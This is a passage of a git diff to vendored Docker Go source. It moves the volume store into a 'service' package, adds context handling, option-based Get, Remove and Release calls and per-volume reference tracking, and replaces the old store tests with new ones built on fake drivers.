+ // TODO: there could be some inconsistent details such as labels here + if vv, _ := s.getNamed(v.Name()); vv != nil { + return vv, nil + } } // Since there isn't a specified driver name, let's see if any of the existing drivers have this volume name if driverName == "" { - v, _ := s.getVolume(name) + v, _ = s.getVolume(ctx, name, "") if v != nil { return v, nil } } - vd, err := volumedrivers.CreateDriver(driverName) - + if driverName == "" { + driverName = volume.DefaultDriverName + } + vd, err := s.drivers.CreateDriver(driverName) if err != nil { return nil, &OpErr{Op: "create", Name: name, Err: err} } logrus.Debugf("Registering new volume reference: driver %q, name %q", vd.Name(), name) - - if v, _ := vd.Get(name); v != nil { - return v, nil - } - v, err = vd.Create(name, opts) - if err != nil { - return nil, err + if v, _ = vd.Get(name); v == nil { + v, err = vd.Create(name, opts) + if err != nil { + if _, err := s.drivers.ReleaseDriver(driverName); err != nil { + logrus.WithError(err).WithField("driver", driverName).Error("Error releasing reference to volume driver") + } + return nil, err + } } + s.globalLock.Lock() s.labels[name] = labels s.options[name] = opts + s.refs[name] = make(map[string]struct{}) s.globalLock.Unlock() metadata := volumeMetadata{ @@ -405,58 +623,57 @@ func (s *VolumeStore) create(name, driverName string, opts, labels map[string]st return volumeWrapper{v, labels, vd.Scope(), opts}, nil } -// GetWithRef gets a volume with the given name from the passed in driver and stores the ref -// This is just like Get(), but we store the reference while holding the lock. 
-// This makes sure there are no races between checking for the existence of a volume and adding a reference for it -func (s *VolumeStore) GetWithRef(name, driverName, ref string) (volume.Volume, error) { - name = normaliseVolumeName(name) - s.locks.Lock(name) - defer s.locks.Unlock(name) - - vd, err := volumedrivers.GetDriver(driverName) - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "get"} - } - - v, err := vd.Get(name) - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "get"} - } - - s.setNamed(v, ref) - - s.globalLock.RLock() - defer s.globalLock.RUnlock() - return volumeWrapper{v, s.labels[name], vd.Scope(), s.options[name]}, nil -} - // Get looks if a volume with the given name exists and returns it if so -func (s *VolumeStore) Get(name string) (volume.Volume, error) { - name = normaliseVolumeName(name) +func (s *VolumeStore) Get(ctx context.Context, name string, getOptions ...opts.GetOption) (volume.Volume, error) { + var cfg opts.GetConfig + for _, o := range getOptions { + o(&cfg) + } + name = normalizeVolumeName(name) s.locks.Lock(name) defer s.locks.Unlock(name) - v, err := s.getVolume(name) + v, err := s.getVolume(ctx, name, cfg.Driver) if err != nil { return nil, &OpErr{Err: err, Name: name, Op: "get"} } - s.setNamed(v, "") + if cfg.Driver != "" && v.DriverName() != cfg.Driver { + return nil, &OpErr{Name: name, Op: "get", Err: errdefs.Conflict(errors.New("found volume driver does not match passed in driver"))} + } + s.setNamed(v, cfg.Reference) return v, nil } // getVolume requests the volume, if the driver info is stored it just accesses that driver, // if the driver is unknown it probes all drivers until it finds the first volume with that name. 
// it is expected that callers of this function hold any necessary locks -func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { +func (s *VolumeStore) getVolume(ctx context.Context, name, driverName string) (volume.Volume, error) { var meta volumeMetadata meta, err := s.getMeta(name) if err != nil { return nil, err } - driverName := meta.Driver + if driverName != "" { + if meta.Driver == "" { + meta.Driver = driverName + } + if driverName != meta.Driver { + return nil, errdefs.Conflict(errors.New("provided volume driver does not match stored driver")) + } + } + + if driverName == "" { + driverName = meta.Driver + } if driverName == "" { s.globalLock.RLock() + select { + case <-ctx.Done(): + s.globalLock.RUnlock() + return nil, ctx.Err() + default: + } v, exists := s.names[name] s.globalLock.RUnlock() if exists { @@ -468,17 +685,17 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { } if meta.Driver != "" { - vol, err := lookupVolume(meta.Driver, name) + vol, err := lookupVolume(ctx, s.drivers, meta.Driver, name) if err != nil { return nil, err } if vol == nil { - s.Purge(name) + s.purge(ctx, name) return nil, errNoSuchVolume } var scope string - vd, err := volumedrivers.GetDriver(meta.Driver) + vd, err := s.drivers.GetDriver(meta.Driver) if err == nil { scope = vd.Scope() } @@ -486,12 +703,17 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { } logrus.Debugf("Probing all drivers for volume with name: %s", name) - drivers, err := volumedrivers.GetAllDrivers() + drivers, err := s.drivers.GetAllDrivers() if err != nil { return nil, err } for _, d := range drivers { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } v, err := d.Get(name) if err != nil || v == nil { continue @@ -510,8 +732,12 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { // If the driver returns an error that is not communication related the // error is logged but not returned. 
// If the volume is not found it will return `nil, nil`` -func lookupVolume(driverName, volumeName string) (volume.Volume, error) { - vd, err := volumedrivers.GetDriver(driverName) +// TODO(@cpuguy83): plumb through the context to lower level components +func lookupVolume(ctx context.Context, store *drivers.Store, driverName, volumeName string) (volume.Volume, error) { + if driverName == "" { + driverName = volume.DefaultDriverName + } + vd, err := store.GetDriver(driverName) if err != nil { return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName) } @@ -519,119 +745,102 @@ func lookupVolume(driverName, volumeName string) (volume.Volume, error) { if err != nil { err = errors.Cause(err) if _, ok := err.(net.Error); ok { - return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", v.Name(), v.DriverName()) + if v != nil { + volumeName = v.Name() + driverName = v.DriverName() + } + return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName) } // At this point, the error could be anything from the driver, such as "no such volume" // Let's not check an error here, and instead check if the driver returned a volume - logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Warnf("Error while looking up volume") + logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Debug("Error while looking up volume") } return v, nil } // Remove removes the requested volume. 
A volume is not removed if it has any refs -func (s *VolumeStore) Remove(v volume.Volume) error { - name := normaliseVolumeName(v.Name()) +func (s *VolumeStore) Remove(ctx context.Context, v volume.Volume, rmOpts ...opts.RemoveOption) error { + var cfg opts.RemoveConfig + for _, o := range rmOpts { + o(&cfg) + } + + name := v.Name() s.locks.Lock(name) defer s.locks.Unlock(name) - refs := s.getRefs(name) - if len(refs) > 0 { - return &OpErr{Err: errVolumeInUse, Name: v.Name(), Op: "remove", Refs: refs} + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + + if s.hasRef(name) { + return &OpErr{Err: errVolumeInUse, Name: name, Op: "remove", Refs: s.getRefs(name)} } - vd, err := volumedrivers.GetDriver(v.DriverName()) + v, err := s.getVolume(ctx, name, v.DriverName()) if err != nil { - return &OpErr{Err: err, Name: vd.Name(), Op: "remove"} + return err + } + + vd, err := s.drivers.GetDriver(v.DriverName()) + if err != nil { + return &OpErr{Err: err, Name: v.DriverName(), Op: "remove"} } logrus.Debugf("Removing volume reference: driver %s, name %s", v.DriverName(), name) vol := unwrapVolume(v) - if err := vd.Remove(vol); err != nil { - return &OpErr{Err: err, Name: name, Op: "remove"} + + err = vd.Remove(vol) + if err != nil { + err = &OpErr{Err: err, Name: name, Op: "remove"} } - s.Purge(name) - return nil + if err == nil || cfg.PurgeOnError { + if e := s.purge(ctx, name); e != nil && err == nil { + err = e + } + } + return err } -// Dereference removes the specified reference to the volume -func (s *VolumeStore) Dereference(v volume.Volume, ref string) { - s.locks.Lock(v.Name()) - defer s.locks.Unlock(v.Name()) +// Release releases the specified reference to the volume +func (s *VolumeStore) Release(ctx context.Context, name string, ref string) error { + s.locks.Lock(name) + defer s.locks.Unlock(name) + select { + case <-ctx.Done(): + return ctx.Err() + default: + } s.globalLock.Lock() defer s.globalLock.Unlock() - var refs []string - for _, r := range 
s.refs[v.Name()] { - if r != ref { - refs = append(refs, r) - } + select { + case <-ctx.Done(): + return ctx.Err() + default: } - s.refs[v.Name()] = refs -} - -// Refs gets the current list of refs for the given volume -func (s *VolumeStore) Refs(v volume.Volume) []string { - s.locks.Lock(v.Name()) - defer s.locks.Unlock(v.Name()) - - refs := s.getRefs(v.Name()) - refsOut := make([]string, len(refs)) - copy(refsOut, refs) - return refsOut -} -// FilterByDriver returns the available volumes filtered by driver name -func (s *VolumeStore) FilterByDriver(name string) ([]volume.Volume, error) { - vd, err := volumedrivers.GetDriver(name) - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "list"} - } - ls, err := vd.List() - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "list"} + if s.refs[name] != nil { + delete(s.refs[name], ref) } - for i, v := range ls { - options := map[string]string{} - s.globalLock.RLock() - for key, value := range s.options[v.Name()] { - options[key] = value - } - ls[i] = volumeWrapper{v, s.labels[v.Name()], vd.Scope(), options} - s.globalLock.RUnlock() - } - return ls, nil + return nil } -// FilterByUsed returns the available volumes filtered by if they are in use or not. -// `used=true` returns only volumes that are being used, while `used=false` returns -// only volumes that are not being used. -func (s *VolumeStore) FilterByUsed(vols []volume.Volume, used bool) []volume.Volume { - return s.filter(vols, func(v volume.Volume) bool { - s.locks.Lock(v.Name()) - l := len(s.getRefs(v.Name())) - s.locks.Unlock(v.Name()) - if (used && l > 0) || (!used && l == 0) { - return true - } - return false - }) -} +// CountReferences gives a count of all references for a given volume. 
+func (s *VolumeStore) CountReferences(v volume.Volume) int { + name := normalizeVolumeName(v.Name()) -// filterFunc defines a function to allow filter volumes in the store -type filterFunc func(vol volume.Volume) bool + s.locks.Lock(name) + defer s.locks.Unlock(name) + s.globalLock.Lock() + defer s.globalLock.Unlock() -// filter returns the available volumes filtered by a filterFunc function -func (s *VolumeStore) filter(vols []volume.Volume, f filterFunc) []volume.Volume { - var ls []volume.Volume - for _, v := range vols { - if f(v) { - ls = append(ls, v) - } - } - return ls + return len(s.refs[name]) } func unwrapVolume(v volume.Volume) volume.Volume { diff --git a/vendor/github.com/docker/docker/volume/service/store_test.go b/vendor/github.com/docker/docker/volume/service/store_test.go new file mode 100644 index 0000000000..53345f318b --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/store_test.go @@ -0,0 +1,421 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "context" + "errors" + "fmt" + "io/ioutil" + "net" + "os" + "strings" + "testing" + + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + volumetestutils "github.com/docker/docker/volume/testutils" + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCreate(t *testing.T) { + t.Parallel() + + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + + ctx := context.Background() + v, err := s.Create(ctx, "fake1", "fake") + if err != nil { + t.Fatal(err) + } + if v.Name() != "fake1" { + t.Fatalf("Expected fake1 volume, got %v", v) + } + if l, _, _ := s.Find(ctx, nil); len(l) != 1 { + t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l) + } + + if _, err := s.Create(ctx, "none", "none"); err == nil { + t.Fatalf("Expected unknown driver error, got 
nil") + } + + _, err = s.Create(ctx, "fakeerror", "fake", opts.WithCreateOptions(map[string]string{"error": "create error"})) + expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")} + if err != nil && err.Error() != expected.Error() { + t.Fatalf("Expected create fakeError: create error, got %v", err) + } +} + +func TestRemove(t *testing.T) { + t.Parallel() + + s, cleanup := setupTest(t) + defer cleanup() + + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + + ctx := context.Background() + + // doing string compare here since this error comes directly from the driver + expected := "no such volume" + var v volume.Volume = volumetestutils.NoopVolume{} + if err := s.Remove(ctx, v); err == nil || !strings.Contains(err.Error(), expected) { + t.Fatalf("Expected error %q, got %v", expected, err) + } + + v, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("fake")) + if err != nil { + t.Fatal(err) + } + + if err := s.Remove(ctx, v); !IsInUse(err) { + t.Fatalf("Expected ErrVolumeInUse error, got %v", err) + } + s.Release(ctx, v.Name(), "fake") + if err := s.Remove(ctx, v); err != nil { + t.Fatal(err) + } + if l, _, _ := s.Find(ctx, nil); len(l) != 0 { + t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l) + } +} + +func TestList(t *testing.T) { + t.Parallel() + + dir, err := ioutil.TempDir("", "test-list") + assert.NilError(t, err) + defer os.RemoveAll(dir) + + drivers := volumedrivers.NewStore(nil) + drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + drivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2") + + s, err := NewStore(dir, drivers) + assert.NilError(t, err) + + ctx := context.Background() + if _, err := s.Create(ctx, "test", "fake"); err != nil { + t.Fatal(err) + } + if _, err := s.Create(ctx, "test2", "fake2"); err != nil { + t.Fatal(err) + } + + ls, _, err := s.Find(ctx, nil) + if err != nil { + 
t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } + if err := s.Shutdown(); err != nil { + t.Fatal(err) + } + + // and again with a new store + s, err = NewStore(dir, drivers) + if err != nil { + t.Fatal(err) + } + ls, _, err = s.Find(ctx, nil) + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } +} + +func TestFindByDriver(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + + assert.Assert(t, s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")) + assert.Assert(t, s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")) + + ctx := context.Background() + _, err := s.Create(ctx, "fake1", "fake") + assert.NilError(t, err) + + _, err = s.Create(ctx, "fake2", "fake") + assert.NilError(t, err) + + _, err = s.Create(ctx, "fake3", "noop") + assert.NilError(t, err) + + l, _, err := s.Find(ctx, ByDriver("fake")) + assert.NilError(t, err) + assert.Equal(t, len(l), 2) + + l, _, err = s.Find(ctx, ByDriver("noop")) + assert.NilError(t, err) + assert.Equal(t, len(l), 1) + + l, _, err = s.Find(ctx, ByDriver("nosuchdriver")) + assert.NilError(t, err) + assert.Equal(t, len(l), 0) +} + +func TestFindByReferenced(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + + ctx := context.Background() + if _, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("volReference")); err != nil { + t.Fatal(err) + } + if _, err := s.Create(ctx, "fake2", "fake"); err != nil { + t.Fatal(err) + } + + dangling, _, err := s.Find(ctx, ByReferenced(false)) + assert.Assert(t, err) + assert.Assert(t, len(dangling) == 1) + assert.Check(t, dangling[0].Name() == "fake2") + + used, _, err := s.Find(ctx, ByReferenced(true)) + assert.Assert(t, err) + assert.Assert(t, len(used) == 1) + 
assert.Check(t, used[0].Name() == "fake1") +} + +func TestDerefMultipleOfSameRef(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + + ctx := context.Background() + v, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("volReference")) + if err != nil { + t.Fatal(err) + } + + if _, err := s.Get(ctx, "fake1", opts.WithGetDriver("fake"), opts.WithGetReference("volReference")); err != nil { + t.Fatal(err) + } + + s.Release(ctx, v.Name(), "volReference") + if err := s.Remove(ctx, v); err != nil { + t.Fatal(err) + } +} + +func TestCreateKeepOptsLabelsWhenExistsRemotely(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + + vd := volumetestutils.NewFakeDriver("fake") + s.drivers.Register(vd, "fake") + + // Create a volume in the driver directly + if _, err := vd.Create("foo", nil); err != nil { + t.Fatal(err) + } + + ctx := context.Background() + v, err := s.Create(ctx, "foo", "fake", opts.WithCreateLabels(map[string]string{"hello": "world"})) + if err != nil { + t.Fatal(err) + } + + switch dv := v.(type) { + case volume.DetailedVolume: + if dv.Labels()["hello"] != "world" { + t.Fatalf("labels don't match") + } + default: + t.Fatalf("got unexpected type: %T", v) + } +} + +func TestDefererencePluginOnCreateError(t *testing.T) { + t.Parallel() + + var ( + l net.Listener + err error + ) + + for i := 32768; l == nil && i < 40000; i++ { + l, err = net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", i)) + } + if l == nil { + t.Fatalf("could not create listener: %v", err) + } + defer l.Close() + + s, cleanup := setupTest(t) + defer cleanup() + + d := volumetestutils.NewFakeDriver("TestDefererencePluginOnCreateError") + p, err := volumetestutils.MakeFakePlugin(d, l) + if err != nil { + t.Fatal(err) + } + + pg := volumetestutils.NewFakePluginGetter(p) + s.drivers = volumedrivers.NewStore(pg) + + ctx := context.Background() + // create a good volume so 
we have a plugin reference + _, err = s.Create(ctx, "fake1", d.Name()) + if err != nil { + t.Fatal(err) + } + + // Now create another one expecting an error + _, err = s.Create(ctx, "fake2", d.Name(), opts.WithCreateOptions(map[string]string{"error": "some error"})) + if err == nil || !strings.Contains(err.Error(), "some error") { + t.Fatalf("expected an error on create: %v", err) + } + + // There should be only 1 plugin reference + if refs := volumetestutils.FakeRefs(p); refs != 1 { + t.Fatalf("expected 1 plugin reference, got: %d", refs) + } +} + +func TestRefDerefRemove(t *testing.T) { + t.Parallel() + + driverName := "test-ref-deref-remove" + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + ctx := context.Background() + v, err := s.Create(ctx, "test", driverName, opts.WithCreateReference("test-ref")) + assert.NilError(t, err) + + err = s.Remove(ctx, v) + assert.Assert(t, is.ErrorContains(err, "")) + assert.Equal(t, errVolumeInUse, err.(*OpErr).Err) + + s.Release(ctx, v.Name(), "test-ref") + err = s.Remove(ctx, v) + assert.NilError(t, err) +} + +func TestGet(t *testing.T) { + t.Parallel() + + driverName := "test-get" + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + ctx := context.Background() + _, err := s.Get(ctx, "not-exist") + assert.Assert(t, is.ErrorContains(err, "")) + assert.Equal(t, errNoSuchVolume, err.(*OpErr).Err) + + v1, err := s.Create(ctx, "test", driverName, opts.WithCreateLabels(map[string]string{"a": "1"})) + assert.NilError(t, err) + + v2, err := s.Get(ctx, "test") + assert.NilError(t, err) + assert.DeepEqual(t, v1, v2, cmpVolume) + + dv := v2.(volume.DetailedVolume) + assert.Equal(t, "1", dv.Labels()["a"]) + + err = s.Remove(ctx, v1) + assert.NilError(t, err) +} + +func TestGetWithReference(t *testing.T) { + t.Parallel() + + driverName := "test-get-with-ref" + s, cleanup := setupTest(t) + 
defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + ctx := context.Background() + _, err := s.Get(ctx, "not-exist", opts.WithGetDriver(driverName), opts.WithGetReference("test-ref")) + assert.Assert(t, is.ErrorContains(err, "")) + + v1, err := s.Create(ctx, "test", driverName, opts.WithCreateLabels(map[string]string{"a": "1"})) + assert.NilError(t, err) + + v2, err := s.Get(ctx, "test", opts.WithGetDriver(driverName), opts.WithGetReference("test-ref")) + assert.NilError(t, err) + assert.DeepEqual(t, v1, v2, cmpVolume) + + err = s.Remove(ctx, v2) + assert.Assert(t, is.ErrorContains(err, "")) + assert.Equal(t, errVolumeInUse, err.(*OpErr).Err) + + s.Release(ctx, v2.Name(), "test-ref") + err = s.Remove(ctx, v2) + assert.NilError(t, err) +} + +var cmpVolume = cmp.AllowUnexported(volumetestutils.FakeVolume{}, volumeWrapper{}) + +func setupTest(t *testing.T) (*VolumeStore, func()) { + t.Helper() + + dirName := strings.Replace(t.Name(), string(os.PathSeparator), "_", -1) + dir, err := ioutil.TempDir("", dirName) + assert.NilError(t, err) + + cleanup := func() { + t.Helper() + err := os.RemoveAll(dir) + assert.Check(t, err) + } + + s, err := NewStore(dir, volumedrivers.NewStore(nil)) + assert.Check(t, err) + return s, func() { + s.Shutdown() + cleanup() + } +} + +func TestFilterFunc(t *testing.T) { + testDriver := volumetestutils.NewFakeDriver("test") + testVolume, err := testDriver.Create("test", nil) + assert.NilError(t, err) + testVolume2, err := testDriver.Create("test2", nil) + assert.NilError(t, err) + testVolume3, err := testDriver.Create("test3", nil) + assert.NilError(t, err) + + for _, test := range []struct { + vols []volume.Volume + fn filterFunc + desc string + expect []volume.Volume + }{ + {desc: "test nil list", vols: nil, expect: nil, fn: func(volume.Volume) bool { return true }}, + {desc: "test empty list", vols: []volume.Volume{}, expect: []volume.Volume{}, fn: func(volume.Volume) bool { return true }}, + {desc: 
"test filter non-empty to empty", vols: []volume.Volume{testVolume}, expect: []volume.Volume{}, fn: func(volume.Volume) bool { return false }},
+	{desc: "test nothing to filter non-empty list", vols: []volume.Volume{testVolume}, expect: []volume.Volume{testVolume}, fn: func(volume.Volume) bool { return true }},
+	{desc: "test filter some", vols: []volume.Volume{testVolume, testVolume2}, expect: []volume.Volume{testVolume}, fn: func(v volume.Volume) bool { return v.Name() == testVolume.Name() }},
+	{desc: "test filter middle", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume, testVolume3}, fn: func(v volume.Volume) bool { return v.Name() != testVolume2.Name() }},
+	{desc: "test filter middle and last", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume}, fn: func(v volume.Volume) bool { return v.Name() != testVolume2.Name() && v.Name() != testVolume3.Name() }},
+	{desc: "test filter first and last", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume2}, fn: func(v volume.Volume) bool { return v.Name() != testVolume.Name() && v.Name() != testVolume3.Name() }},
+	} {
+		t.Run(test.desc, func(t *testing.T) {
+			test := test
+			t.Parallel()
+
+			filter(&test.vols, test.fn)
+			assert.DeepEqual(t, test.vols, test.expect, cmpVolume)
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/service/store_unix.go b/vendor/github.com/docker/docker/volume/service/store_unix.go
new file mode 100644
index 0000000000..4ccc4b9999
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/store_unix.go
@@ -0,0 +1,9 @@
+// +build linux freebsd darwin
+
+package service // import "github.com/docker/docker/volume/service"
+
+// normalizeVolumeName is a platform specific function to normalize the name
+// of a volume. 
This is a no-op on Unix-like platforms +func normalizeVolumeName(name string) string { + return name +} diff --git a/vendor/github.com/docker/docker/volume/store/store_windows.go b/vendor/github.com/docker/docker/volume/service/store_windows.go similarity index 59% rename from vendor/github.com/docker/docker/volume/store/store_windows.go rename to vendor/github.com/docker/docker/volume/service/store_windows.go index 8601cdd5cf..bd46a6893e 100644 --- a/vendor/github.com/docker/docker/volume/store/store_windows.go +++ b/vendor/github.com/docker/docker/volume/service/store_windows.go @@ -1,12 +1,12 @@ -package store +package service // import "github.com/docker/docker/volume/service" import "strings" -// normaliseVolumeName is a platform specific function to normalise the name +// normalizeVolumeName is a platform specific function to normalize the name // of a volume. On Windows, as NTFS is case insensitive, under // c:\ProgramData\Docker\Volumes\, the folders John and john would be synonymous. // Hence we can't allow the volume "John" and "john" to be created as separate // volumes. 
-func normaliseVolumeName(name string) string { +func normalizeVolumeName(name string) string { return strings.ToLower(name) } diff --git a/vendor/github.com/docker/docker/volume/store/store_test.go b/vendor/github.com/docker/docker/volume/store/store_test.go deleted file mode 100644 index b52f720ca1..0000000000 --- a/vendor/github.com/docker/docker/volume/store/store_test.go +++ /dev/null @@ -1,234 +0,0 @@ -package store - -import ( - "errors" - "io/ioutil" - "os" - "strings" - "testing" - - "github.com/docker/docker/volume/drivers" - volumetestutils "github.com/docker/docker/volume/testutils" -) - -func TestCreate(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - defer volumedrivers.Unregister("fake") - dir, err := ioutil.TempDir("", "test-create") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(dir) - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - v, err := s.Create("fake1", "fake", nil, nil) - if err != nil { - t.Fatal(err) - } - if v.Name() != "fake1" { - t.Fatalf("Expected fake1 volume, got %v", v) - } - if l, _, _ := s.List(); len(l) != 1 { - t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l) - } - - if _, err := s.Create("none", "none", nil, nil); err == nil { - t.Fatalf("Expected unknown driver error, got nil") - } - - _, err = s.Create("fakeerror", "fake", map[string]string{"error": "create error"}, nil) - expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")} - if err != nil && err.Error() != expected.Error() { - t.Fatalf("Expected create fakeError: create error, got %v", err) - } -} - -func TestRemove(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") - defer volumedrivers.Unregister("fake") - defer volumedrivers.Unregister("noop") - dir, err := ioutil.TempDir("", "test-remove") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(dir) 
- s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - // doing string compare here since this error comes directly from the driver - expected := "no such volume" - if err := s.Remove(volumetestutils.NoopVolume{}); err == nil || !strings.Contains(err.Error(), expected) { - t.Fatalf("Expected error %q, got %v", expected, err) - } - - v, err := s.CreateWithRef("fake1", "fake", "fake", nil, nil) - if err != nil { - t.Fatal(err) - } - - if err := s.Remove(v); !IsInUse(err) { - t.Fatalf("Expected ErrVolumeInUse error, got %v", err) - } - s.Dereference(v, "fake") - if err := s.Remove(v); err != nil { - t.Fatal(err) - } - if l, _, _ := s.List(); len(l) != 0 { - t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l) - } -} - -func TestList(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2") - defer volumedrivers.Unregister("fake") - defer volumedrivers.Unregister("fake2") - dir, err := ioutil.TempDir("", "test-list") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(dir) - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - if _, err := s.Create("test", "fake", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("test2", "fake2", nil, nil); err != nil { - t.Fatal(err) - } - - ls, _, err := s.List() - if err != nil { - t.Fatal(err) - } - if len(ls) != 2 { - t.Fatalf("expected 2 volumes, got: %d", len(ls)) - } - if err := s.Shutdown(); err != nil { - t.Fatal(err) - } - - // and again with a new store - s, err = New(dir) - if err != nil { - t.Fatal(err) - } - ls, _, err = s.List() - if err != nil { - t.Fatal(err) - } - if len(ls) != 2 { - t.Fatalf("expected 2 volumes, got: %d", len(ls)) - } -} - -func TestFilterByDriver(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") - defer volumedrivers.Unregister("fake") - 
defer volumedrivers.Unregister("noop") - dir, err := ioutil.TempDir("", "test-filter-driver") - if err != nil { - t.Fatal(err) - } - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - if _, err := s.Create("fake1", "fake", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("fake2", "fake", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("fake3", "noop", nil, nil); err != nil { - t.Fatal(err) - } - - if l, _ := s.FilterByDriver("fake"); len(l) != 2 { - t.Fatalf("Expected 2 volumes, got %v, %v", len(l), l) - } - - if l, _ := s.FilterByDriver("noop"); len(l) != 1 { - t.Fatalf("Expected 1 volume, got %v, %v", len(l), l) - } -} - -func TestFilterByUsed(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") - dir, err := ioutil.TempDir("", "test-filter-used") - if err != nil { - t.Fatal(err) - } - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - if _, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("fake2", "fake", nil, nil); err != nil { - t.Fatal(err) - } - - vols, _, err := s.List() - if err != nil { - t.Fatal(err) - } - - dangling := s.FilterByUsed(vols, false) - if len(dangling) != 1 { - t.Fatalf("expected 1 danging volume, got %v", len(dangling)) - } - if dangling[0].Name() != "fake2" { - t.Fatalf("expected danging volume fake2, got %s", dangling[0].Name()) - } - - used := s.FilterByUsed(vols, true) - if len(used) != 1 { - t.Fatalf("expected 1 used volume, got %v", len(used)) - } - if used[0].Name() != "fake1" { - t.Fatalf("expected used volume fake1, got %s", used[0].Name()) - } -} - -func TestDerefMultipleOfSameRef(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - dir, err := ioutil.TempDir("", "test-same-deref") - if err != nil { - t.Fatal(err) - } - - s, err := New(dir) - if err != nil { - 
